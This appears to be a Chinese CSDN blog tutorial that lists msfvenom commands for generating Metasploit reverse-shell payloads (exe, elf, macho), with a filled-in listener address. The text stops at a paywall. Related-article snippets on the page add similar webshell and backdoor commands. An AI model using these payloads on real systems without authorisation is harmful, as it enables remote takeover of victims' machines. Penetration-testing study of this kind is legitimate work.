msf生成webshell_生成常用的msf

最新推荐文章于 2024-05-03 02:53:01 发布
最新推荐文章于 2024-05-03 02:53:01 发布
阅读量683 收藏 1
点赞数
文章标签: msf生成webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39759441/article/details/111836432
版权

msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。

在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:

msfvenom -l

生成二进制文件

关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

如何利用

针对这个部分就以Windows为例,使用上面的命令生成一个exe的payload,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f exe > shell.exe

复制shell.exe到Windows机器࿰

最低0.47元/天 解锁文章
weixin_39759441
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
创毅视讯的CMMB Dongle 播放软件,可播放CMMB MFS、MSF格式的流,内附杭州CMMB的码流
msf.rar_Fighter_street fighter_动作游戏_街头霸王_街机
09-22
街头霸王游戏。动作类,与街机版街头霸王类似。
2024年最新WebShell脚本检测机器学习二_机器学习检测webshell脚本实践(1)
最新发布
2301_76379776的博客
05-03 620
logger.info(“白样本总量:%i” % normal_number)logger.info(“黑样本总量:%i” % webshell_number)logger.info(“准确率:%s” % metrics.accuracy_score(y_test, y_pred))logger.info(“训练集评估:”)logger.info(“测试集评估:”)
MSF Toolkit_zip_
10-03
rastat toolkits for voice implementing
metasploit自动化渗透攻击模块
11-18
metasploit自动化渗透攻击模块db_autopwn
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
ros RTK驱动,可用于ROS开发,需要建立ROS工作空间
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 322
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
msf生成webshell_msfwebshell 提权
weixin_39623411的博客
12-22 347
首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产...
MSF-从webshell到完全控制
scrawman的博客
01-18 845
文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import
渗透测试获取webshell方法总结
u013930899的博客
10-06 3150
本文总结了渗透测试php网站获取webshell的几种方法
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3320
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenommsfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
用Matlab实现基于均值平移(meanshift)算法的灰度图像平滑。有迭代过程,效果比较不错。
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
黄乔国PHP
03-22 8388
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
kali攻防第13章 Metasploit之生成webshell及应用
安全参透之旅
12-24 6334
Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit   步骤:   1、在msf生成asp脚本木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.
weevely混淆webshell联动msf
灰太的表格的博客
06-15 492
weevely混淆webshell的联合msf 生成 可以看到有两个参数,分别对应着进行混淆的两种方式。我们分别来试一下 整理一下代码稍后分析下混淆过程: 利用 将混淆后的webshell进行上传,并进行连接,会传回一个交互式的shell 常用命令: :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd
MSF建立webshell后门,并监听端口建立session连接
热门推荐
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
利用msf生成后门拿shell
qq_36406396的博客
11-15 1万+
kali  x64:192.168.26.136 win7  x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后将生成的qq.exe移到win7中,然后打开msf
Kali的学习笔记篇(八)使用msf生成shellcode制作免杀payload
Kind&红衣的博客
08-13 6478
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
Metasploit 之 webshell 提权
收集盒 Book box
08-04 1793
本文所涉及的方法只能在已授权的机器上做测试。     首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell
msf生成反弹shell
08-28
你可以使用Metasploit Framework (MSF)来生成一个反弹shell。这里有一个示例,展示如何使用MSF生成一个反弹到攻击者机器的shell: 1. 首先,启动Metasploit Framework控制台。在终端中输入 `msfconsole` 并按下回车...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值